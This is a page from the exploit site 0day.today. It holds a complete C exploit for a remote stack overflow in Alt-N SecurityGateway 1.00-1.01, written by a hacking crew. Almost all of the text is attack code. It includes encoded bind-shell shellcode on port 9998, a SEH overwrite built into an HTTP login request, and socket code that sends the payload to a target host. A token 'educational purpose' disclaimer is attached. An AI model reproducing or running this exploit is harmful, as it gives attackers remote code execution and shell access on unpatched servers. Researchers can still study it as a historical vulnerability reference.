0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Alt-N SecurityGateway 1.00-1.01 Remote Stack Overflow Exploit
============================================================= Alt-N SecurityGateway 1.00-1.01 Remote Stack Overflow Exploit ============================================================= /* Dreatica-FXP crew * * ---------------------------------------- * Target : Alt-N SecurityGateway v1.00-1.01 * ---------------------------------------- * Exploit : Alt-N SecurityGateway v1.00-1.01 Remote Stack Overflow Exploit * Exploit date : 11.06.2008-14.06.2008 * Exploit writer : Heretic2 (heretic2x@gmail.com) * OS : Windows ALL * Crew : Dreatica-FXP * ---------------------------------------- * Details : Obtain the overflow and crash the application is peace a cake job. * To make a wroking code execution here is a hell. First we can see that * the username before overflow the buffer pass through some functions, * that changes and restrict some useful chars. Firstly the beffer gets * lowered so the overflow should not contain upper chars :( . So i decided * to use some encoders for the payload like nonupper and non alpha from MSF. * The nonupper use the `@` (0x40) char which the app doesn't eat at all. * The nonalpha encoder in decoder code and the generated body contained * always the 0xC0, 0xC1, 0x80, 0x81 which were translated to 0xE0, 0xE1, * 0x90, 0x91. Don't know, may be this chars translation was due to my russian locale. * After few days of work i have comed with the required bindshell which bypass * all restricted chars and executes. Thx to skylined, for his alpha tool. * Bad chars : 0x00 0x40 0x41 0x42 0x43 0x44 0x45 0x46 0x47 0x48 0x49 0x4A 0x4B 0x4C 0x4D 0x4E * 0x4F 0x50 0x51 0x52 0x53 0x54 0x55 0x56 0x57 0x58 0x59 0x5A 0x40 0x7b 0xAA 0xC0 * 0xC1 0xC2 0x80 0x81 * ---------------------------------------- * Thanks to: * 1. securfrog ( <securfrog [at] gmail.com> ) * 2. ALPHA 2: Zero-tolerance ( <skylined [at] edup.tudelft.nl> ) * 3. The Metasploit project ( http://metasploit.com ) * 4. Dreatica-FXP crew ( http://www.dreatica-fxp.com ) ************************************************************************************ * This was written for educational purpose only. Use it at your own risk. Author will be not be * responsible for any damage, caused by that code. */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <winsock2.h> #include <time.h> #pragma comment(lib,"ws2_32") void usage(char * s); void logo(); void end_logo(); void print_info_banner_line(const char * key, const char * val); void extract_ip_and_port( char * &remotehost, int * port, char * str); int fill_payload_args(int sh, int bport, char * reverseip, int reverseport, struct h2readyp * xx); int hr2_connect(char * remotehost, int port, int timeout); int hr2_udpconnect(char * remotehost, int port, struct sockaddr_in * addr, int timeout); int hr2_updsend(char * remotehost, unsigned char * buf, unsigned int len, int port, struct sockaddr_in * addr, int timeout); int execute(struct _buf * abuf, char * remotehost, int port); struct _buf { unsigned char * ptr; unsigned int size; }; int construct_shellcode(int sh, struct _buf * shf, int target); int construct_buffer(struct _buf * shf, int target, struct _buf * abuf); // ----------------------------------------------------------------- // XGetopt.cpp Version 1.2 // ----------------------------------------------------------------- int getopt(int argc, char *argv[], char *optstring); char *optarg; // global argument pointer int optind = 0, opterr; // global argv index // ----------------------------------------------------------------- // ----------------------------------------------------------------- struct { const char * name; int length; char *shellcode; }shellcodes[]={ {"Bindshell, port 9998", 743, /* The non-encoded metasploit payload * windows/shell_bind_tcp - 317 bytes * http://www.metasploit.com * Encoder: generic/none */ /* * Encoder: heretic2's nonupper. with help of skylined tool. */ "\x6a\x20\x5b\x93\xf7\xe0\x91\xe8\xff\xff\xff\xff\x30\x5e\x5e\x66" "\x8b\x7e\x22\x97\x3c\x60\x7c\x07\x2c\x20\x66\x93\x88\x5e\x22\x83" "\xee\xff\xe2\xeb\xe8\xff\xff\xff\xff\x36\x5b\x5b\x93\x91\x83\xe9" "\xf8\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69\x71\x7a\x76\x74" "\x78\x33\x30\x76\x78\x34\x61\x70\x30\x61\x33\x68\x68\x30\x61\x30" "\x30\x61\x62\x61\x61\x62\x74\x61\x61\x71\x32\x61\x62\x32\x62\x62" "\x30\x62\x62\x78\x70\x38\x61\x63\x6a\x6a\x69\x6b\x6c\x32\x6a\x6a" "\x6b\x70\x6d\x6a\x68\x7a\x79\x6b\x6f\x6b\x6f\x6b\x6f\x33\x70\x6c" "\x6b\x72\x6c\x36\x64\x71\x34\x6c\x6b\x71\x75\x77\x6c\x6c\x6b\x73" "\x6c\x73\x35\x33\x68\x35\x71\x7a\x6f\x6c\x6b\x70\x6f\x35\x68\x6c" "\x6b\x71\x6f\x67\x70\x75\x71\x6a\x6b\x77\x39\x6c\x6b\x77\x64\x6c" "\x6b\x75\x71\x7a\x6e\x76\x71\x69\x70\x6d\x69\x6e\x6c\x6b\x34\x69" "\x70\x72\x74\x63\x37\x6f\x31\x38\x6a\x74\x6d\x35\x71\x79\x72\x6a" "\x6b\x6b\x64\x77\x6b\x71\x64\x67\x74\x67\x78\x32\x75\x6d\x35\x6c" "\x6b\x71\x6f\x77\x74\x35\x71\x6a\x6b\x32\x66\x6c\x6b\x74\x6c\x70" "\x6b\x6c\x6b\x71\x6f\x35\x6c\x75\x71\x6a\x6b\x75\x73\x66\x6c\x6c" "\x6b\x6b\x39\x62\x6c\x76\x64\x75\x6c\x33\x71\x6f\x33\x66\x71\x79" "\x6b\x75\x34\x6c\x6b\x71\x73\x36\x70\x6c\x6b\x71\x70\x74\x6c\x6c" "\x6b\x72\x70\x75\x6c\x6e\x6d\x6c\x6b\x71\x70\x35\x78\x71\x6e\x73" "\x78\x6c\x6e\x70\x6e\x64\x6e\x7a\x6c\x30\x70\x6b\x6f\x78\x76\x35" "\x36\x76\x33\x32\x66\x33\x78\x70\x33\x77\x62\x72\x68\x72\x77\x34" "\x33\x76\x72\x71\x6f\x70\x74\x6b\x6f\x78\x70\x62\x68\x38\x6b\x6a" "\x6d\x6b\x6c\x77\x6b\x66\x30\x6b\x6f\x78\x76\x71\x6f\x6b\x39\x6a" "\x65\x73\x76\x6d\x71\x7a\x6d\x73\x38\x64\x62\x70\x75\x62\x6a\x35" "\x72\x6b\x6f\x6e\x30\x72\x68\x78\x79\x75\x79\x6b\x65\x6e\x6d\x66" "\x37\x6b\x6f\x79\x66\x36\x33\x70\x73\x71\x63\x71\x63\x70\x73\x71" "\x73\x71\x63\x31\x73\x36\x33\x6b\x6f\x68\x70\x32\x66\x65\x38\x71" "\x37\x74\x6e\x72\x66\x71\x63\x6b\x39\x6b\x71\x6c\x75\x73\x78\x6f" "\x74\x75\x6a\x74\x30\x6f\x37\x30\x77\x6b\x6f\x79\x66\x32\x6a\x64" "\x70\x36\x31\x31\x65\x6b\x6f\x6e\x30\x75\x38\x6e\x64\x6e\x6d\x76" "\x6e\x6b\x79\x71\x67\x6b\x6f\x78\x76\x70\x73\x70\x75\x6b\x6f\x78" "\x70\x65\x38\x6b\x75\x31\x79\x6c\x66\x70\x69\x30\x77\x6b\x6f\x6e" "\x36\x70\x70\x31\x64\x71\x64\x76\x35\x6b\x6f\x78\x70\x6c\x73\x72" "\x68\x6d\x37\x63\x69\x39\x76\x32\x79\x71\x67\x6b\x6f\x6e\x36\x71" "\x65\x6b\x6f\x78\x70\x73\x76\x73\x7a\x35\x34\x32\x66\x72\x68\x75" "\x33\x72\x6d\x6d\x79\x6b\x75\x72\x6a\x76\x30\x76\x39\x71\x39\x68" "\x6c\x6b\x39\x6d\x37\x72\x6a\x30\x64\x6b\x39\x6b\x72\x76\x71\x6f" "\x30\x7a\x73\x6e\x6a\x6b\x6e\x70\x62\x76\x6d\x6b\x6e\x67\x32\x36" "\x6c\x6a\x33\x6c\x6d\x33\x6a\x76\x78\x6e\x6b\x6e\x6b\x6e\x6b\x63" "\x78\x73\x62\x6b\x6e\x6e\x73\x74\x76\x6b\x6f\x62\x75\x70\x64\x6b" "\x6f\x38\x76\x71\x6b\x76\x37\x76\x32\x30\x71\x30\x71\x70\x71\x72" "\x6a\x65\x71\x30\x71\x30\x71\x30\x75\x70\x71\x6b\x6f\x78\x70\x75" "\x38\x6e\x6d\x6e\x39\x74\x65\x78\x6e\x70\x73\x6b\x6f\x6e\x36\x73" "\x7a\x6b\x6f\x6b\x6f\x36\x77\x6b\x6f\x6e\x30\x6c\x6b\x36\x37\x6b" "\x6c\x6b\x33\x69\x74\x75\x34\x6b\x6f\x38\x76\x66\x32\x6b\x6f\x38" "\x70\x33\x78\x7a\x70\x6c\x6a\x63\x34\x71\x6f\x66\x33\x6b\x6f\x6e" "\x36\x6b\x6f\x68\x70\x61\x61" }, {NULL, 0, NULL} }; struct _target{ const char *t ; unsigned long ret ; } targets[]= { {"Alt-N SecurityGateway 1.00/1.01 universal", 0x67672190 }, // nonupper pop/pop/ret {"DOS/Crash/Debug/Test/Fun", 0x61616161 }, {NULL, 0x00000000 } }; // memory for buffers unsigned char payloadbuffer[10000], a_buffer[10000]; long dwTimeout=5000; int timeout=5000; int main(int argc, char **argv) { char c,*remotehost=NULL,temp1[100]; int sh,port=4000,itarget=0; struct _buf fshellcode, sbuffer; logo(); if(argc<2) { usage(argv[0]); return -1; } WSADATA wsa; WSAStartup(MAKEWORD(2,0), &wsa); // set defaults sh=0; // ------------ while((c = getopt(argc, argv, "h:t:R:T:"))!= EOF) { switch (c) { case 'h': if (strchr(optarg,':')==NULL) { remotehost=optarg; }else { sscanf(strchr(optarg,':')+1, "%d", &port); remotehost=optarg; *(strchr(remotehost,':'))='\0'; } break; case 't': sscanf(optarg, "%d", &itarget); itarget--; break; case 'T': sscanf(optarg, "%ld", &dwTimeout); break; default: usage(argv[0]); WSACleanup(); return -1; } } if(remotehost == NULL) { printf(" [-] Please enter remotehost\n"); end_logo(); WSACleanup(); return -1; } print_info_banner_line("Host", remotehost); sprintf(temp1, "%d", port); print_info_banner_line("Port", temp1); print_info_banner_line("Payload", shellcodes[sh].name); sprintf(temp1, "%d", 9998); print_info_banner_line("BINDPort", temp1); printf(" # ------------------------------------------------------------------- # \n"); fflush(stdout); memset(payloadbuffer, 0, sizeof(payloadbuffer)); fshellcode.ptr=payloadbuffer; fshellcode.size=0; memset(a_buffer, 0, sizeof(a_buffer)); sbuffer.ptr=a_buffer; sbuffer.size=0; if(!construct_shellcode(sh, &fshellcode, itarget)) { end_logo(); WSACleanup(); return -1; } printf(" [+] Payload constructed\n"); if(!construct_buffer(&fshellcode, itarget, &sbuffer)) { printf(" [-] Buffer not constructed\n"); end_logo(); WSACleanup(); return -1; } printf(" [+] Final buffer constructed\n"); if(!execute(&sbuffer, remotehost, port)) { printf(" [-] Buffer not sent\n"); end_logo(); WSACleanup(); return -1; } printf(" [+] Buffer sent\n"); end_logo(); WSACleanup(); return 0; } int construct_shellcode(int sh, struct _buf * shf, int target) { memcpy(shf->ptr, shellcodes[sh].shellcode, shellcodes[sh].length); shf->size=shellcodes[sh].length; return 1; } char templ1[] = "POST /SecurityGateway.dll HTTP/1.0\r\n" "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*\r\n" "Accept-Language: ru\r\n" "Content-Type: application/x-www-form-urlencoded\r\n" "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n" "Content-Length: %d\r\n\r\n"; char templ2[]="RequestedPage=login&username=%s&passwd=world&lang=en&logon=Sign+In"; int encode_uri(char * in, int len, char * out, int *outlen) { char *out2=out; int i; memset(out,0,*outlen); for(i=0;i<len;i++) { *out++='%'; sprintf(out, "%.2x", (unsigned char)in[i]); out+=2; } *outlen=(int)(out-out2); return 0; } int construct_buffer(struct _buf * shf, int target, struct _buf * abuf) { unsigned char * cp; char *lp ; char buf[10000], buf2[10000],rstr1[10000],rstr2[10000]; int olen; cp = abuf->ptr; memset(buf,0,sizeof(buf)); memset(buf2,0,sizeof(buf2)); memset(rstr1,0,sizeof(rstr1)); memset(rstr2,0,sizeof(rstr2)); lp=buf; // overflow memset(lp,'\x61',476); lp+=476; // jmp over seh *lp++='\x90'; *lp++='\x90'; *lp++='\xeb'; *lp++='\x04'; // replace SEH *lp++ = (char)((targets[target].ret ) & 0xff); *lp++ = (char)((targets[target].ret >> 8) & 0xff); *lp++ = (char)((targets[target].ret >> 16) & 0xff); *lp++ = (char)((targets[target].ret >> 24) & 0xff); memset(lp,'\x90',1500); lp+=5; memcpy(lp, shf->ptr, shf->size); lp+=shf->size; olen = 1500; encode_uri(buf, (int)strlen(buf), buf2, &olen); sprintf(rstr2,templ2,buf2); sprintf(rstr1,templ1,strlen(rstr2)); strcat((char*)cp,rstr1); strcat((char*)cp,rstr2); cp+=strlen((char*)cp); abuf->size=(int)(cp-abuf->ptr); return 1; } void extract_ip_and_port( char * &remotehost, int * port, char * str) { if (strchr(str,':')==NULL) { remotehost=str; }else { sscanf(strchr(str,':')+1, "%d", port); remotehost=str; *(strchr(remotehost,':'))='\0'; } } int hr2_connect(char * remotehost, int port, int timeout) { SOCKET s; struct hostent *host; struct sockaddr_in addr; TIMEVAL stTime; TIMEVAL *pstTime = NULL; fd_set x; int res; if (INFINITE != timeout) { stTime.tv_sec = timeout / 1000; stTime.tv_usec = timeout % 1000; pstTime = &stTime; } host = gethostbyname(remotehost); if (!host) return SOCKET_ERROR; addr.sin_addr = *(struct in_addr*)host->h_addr; addr.sin_port = htons(port); addr.sin_family = AF_INET; s = socket(AF_INET, SOCK_STREAM, 0); if (s == SOCKET_ERROR) { closesocket(s); return SOCKET_ERROR; } unsigned long l = 1; ioctlsocket( s, FIONBIO, &l ) ; connect(s, (struct sockaddr*)&addr, sizeof(addr)); FD_ZERO(&x); FD_SET(s, &x); res = select(NULL,NULL,&x,NULL,pstTime); if(res< 0) return SOCKET_ERROR; if(res==0) return 0; return (int)s; } int hr2_tcpsend(SOCKET s, unsigned char * buf, unsigned int len, int timeout) { return send(s, (char *)buf, len, 0); } int hr2_tcprecv(SOCKET s, unsigned char * buf, unsigned int len, int timeout) { TIMEVAL stTime; TIMEVAL *pstTime = NULL; fd_set xy; int res; if (INFINITE != timeout) { stTime.tv_sec = timeout / 1000; stTime.tv_usec = timeout % 1000; pstTime = &stTime; } FD_ZERO(&xy); FD_SET(s, &xy); res = select(NULL,&xy,NULL,NULL,pstTime); if(res==0) return 0; if(res<0) return -1; return recv(s, (char *)buf, len, 0); } int execute(struct _buf * abuf, char * remotehost, int port) { int x; SOCKET s ; char RECVB[10000]; s = hr2_connect(remotehost, port, 10000); if(s==0) { printf(" [-] connect() timeout\n"); return 0; } if(s==SOCKET_ERROR) { printf(" [-] Connection failed\n"); return 0; } x = hr2_tcpsend(s, abuf->ptr, abuf->size, 0); printf(" [+] Sent %d out of %d bytes\n", x, abuf->size); x = hr2_tcprecv(s, (unsigned char *)RECVB, 1000, 0); closesocket(s); return 1; } // ----------------------------------------------------------------- // XGetopt.cpp Version 1.2 // ----------------------------------------------------------------- int getopt(int argc, char *argv[], char *optstring) { static char *next = NULL; if (optind == 0) next = NULL; optarg = NULL; if (next == NULL || *next == '\0') { if (optind == 0) optind++; if (optind >= argc || argv[optind][0] != '-' || argv[optind][1] == '\0') { optarg = NULL; if (optind < argc) optarg = argv[optind]; return EOF; } if (strcmp(argv[optind], "--") == 0) { optind++; optarg = NULL; if (optind < argc) optarg = argv[optind]; return EOF; } next = argv[optind]; next++; // skip past - optind++; } char c = *next++; char *cp = strchr(optstring, c); if (cp == NULL || c == ':') return '?'; cp++; if (*cp == ':') { if (*next != '\0') { optarg = next; next = NULL; } else if (optind < argc) { optarg = argv[optind]; optind++; } else { return '?'; } } return c; } // ----------------------------------------------------------------- // ----------------------------------------------------------------- // ----------------------------------------------------------------- void print_info_banner_line(const char * key, const char * val) { char temp1[100], temp2[100]; memset(temp1,0,sizeof(temp1)); memset(temp1, '\x20' , 58 - strlen(val) -1); memset(temp2,0,sizeof(temp2)); memset(temp2, '\x20' , 8 - strlen(key)); printf(" # %s%s: %s%s# \n", key, temp2, val, temp1); } void usage(char * s) { int j; printf("\n"); printf(" Usage: %s -h <host:port> -t <target>\n", s); printf(" -------------------------------------------------------------------\n"); printf(" Arguments:\n"); printf(" -h ........ host to attack, default port: 4000\n"); printf(" -t ........ target to use\n"); printf(" -T ........ socket timeout\n"); printf("\n"); printf(" Supported SecurityGateway versions:\n"); for(j=0; targets[j].t!=0;j++) { printf(" %d. %s\n",j+1, targets[j].t); } printf("\n"); printf(" Code execution:\n"); for(j=0; shellcodes[j].name!=0;j++) { printf(" %d. %s\n",j+1, shellcodes[j].name); } end_logo(); } void logo() { printf("\n\n"); printf(" ####################################################################### \n"); printf(" # ____ __ _ ______ __ _____ #\n"); printf(" # / __ \\________ _____/ /_(_)_________ / __/\\ \\/ / / _ / #\n"); printf(" # / / / / ___/ _ \\/ __ / __/ / ___/ __ / ___ / / \\ / / // / #\n"); printf(" # / /_/ / / / ___/ /_// /_/ / /__/ /_// /__/ / _/ / \\ / ___/ #\n"); printf(" # /_____/_/ \\___/ \\_,_/\\__/_/\\___/\\__,_/ /_/ /_/\\_\\/_/ #\n"); printf(" # crew #\n"); printf(" ####################################################################### \n"); printf(" # Exploit : Alt-N SecurityGateway 1.00-1.01 Remote Overflow exploit # \n"); printf(" # Solution: Update to 1.02 version # \n"); printf(" # Author : Heretic2 < heretic2x [at] gmail.com > # \n"); printf(" # Version : 1.0 # \n"); printf(" # System : Windows ALL # \n"); printf(" # Date : 11.06.2008 - 14.06.2008 # \n"); printf(" # ------------------------------------------------------------------- # \n"); } void end_logo() { printf(" # ------------------------------------------------------------------- # \n"); printf(" # Dreatica-FXP crew [Heretic2] # \n"); printf(" ####################################################################### \n\n"); } # 0day.today [2024-12-26] #